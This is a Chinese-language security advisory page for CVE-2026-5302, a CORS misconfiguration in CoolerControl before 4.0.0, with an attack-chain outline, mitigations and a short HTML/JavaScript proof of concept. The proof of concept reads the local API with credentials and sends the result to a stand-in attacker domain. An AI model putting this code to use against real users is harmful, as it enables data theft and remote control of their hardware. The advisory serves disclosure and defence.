IPBUF安全漏洞报告
English
CVE-2026-5302 CVSS 6.3 中危

CVE-2026-5302: CoolerControl CORS配置错误漏洞

披露日期: 2026-04-08

漏洞信息

漏洞编号
CVE-2026-5302
漏洞类型
CORS配置错误
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
CoolerControl/coolercontrold

相关标签

CORS配置错误CoolerControl信息泄露远程控制

漏洞概述

CoolerControl/coolercontrold 4.0.0之前版本存在CORS配置错误漏洞。由于服务端未严格限制跨域请求来源,未经身份验证的远程攻击者可诱导受害者访问恶意网站,利用浏览器发起跨域请求读取服务数据或发送控制指令,导致信息泄露或设备被恶意控制。

技术细节

该漏洞的根本原因在于CoolerControl服务端对CORS(跨域资源共享)头的处理逻辑存在缺陷。在正常情况下,浏览器会遵循同源策略,阻止网页访问不同域的资源。但在受影响版本中,服务端可能对Access-Control-Allow-Origin头进行了不安全的配置,例如直接反射请求头中的Origin值或使用了过于宽松的通配符策略,同时错误地启用了凭证支持(Access-Control-Allow-Credentials: true)。攻击者无需直接入侵服务,而是利用这一配置缺陷,构造一个包含恶意JavaScript代码的网页。当受害者访问该网页时,浏览器会携带受害者的凭证(如Cookie)向本地的CoolerControl API发起请求。由于CORS策略失效,浏览器允许恶意网页读取API返回的敏感信息(如硬件温度、风扇转速)或构造POST请求发送控制命令(如修改风扇设置),从而实现了跨域的数据窃取和远程控制。

攻击链分析

STEP 1
1. 准备阶段
攻击者搭建一个恶意网站,并在其中嵌入针对CoolerControl API的跨域请求脚本。
STEP 2
2. 诱导访问
攻击者诱导运行了易受攻击版本的CoolerControl的用户访问该恶意网站。
STEP 3
3. 发起请求
用户浏览器在加载恶意页面时,执行JavaScript代码,向本地CoolerControl服务发起跨域请求。
STEP 4
4. 数据泄露或控制
由于CORS配置错误,浏览器允许读取响应内容。攻击者的脚本获取到敏感数据或成功发送控制命令。
STEP 5
5. 回传数据
窃取的数据或操作结果被发送回攻击者控制的服务器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC for CVE-2026-5302: CORS Misconfiguration This script attempts to read data from the vulnerable CoolerControl API. --> <html> <body> <script> // Target the local CoolerControl API endpoint const targetUrl = 'http://localhost:5000/api/v1/data'; function exploit() { fetch(targetUrl, { method: 'GET', mode: 'cors', credentials: 'include' // Include cookies if available }) .then(response => response.text()) .then(data => { console.log('Exfiltrated Data:', data); // Send data to attacker's server fetch('https://attacker-controlled-domain.com/log?d=' + encodeURIComponent(data)); }) .catch(error => console.error('Exploit failed:', error)); } exploit(); </script> </body> </html>

影响范围

CoolerControl/coolercontrold < 4.0.0

防御指南

临时缓解措施
如果无法立即升级,请确保CoolerControl服务不直接暴露在公网,仅监听本地回环地址(127.0.0.1),并在防火墙中阻断外部访问。同时,用户应避免在浏览不可信网页时保持CoolerControl管理后台的登录状态。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表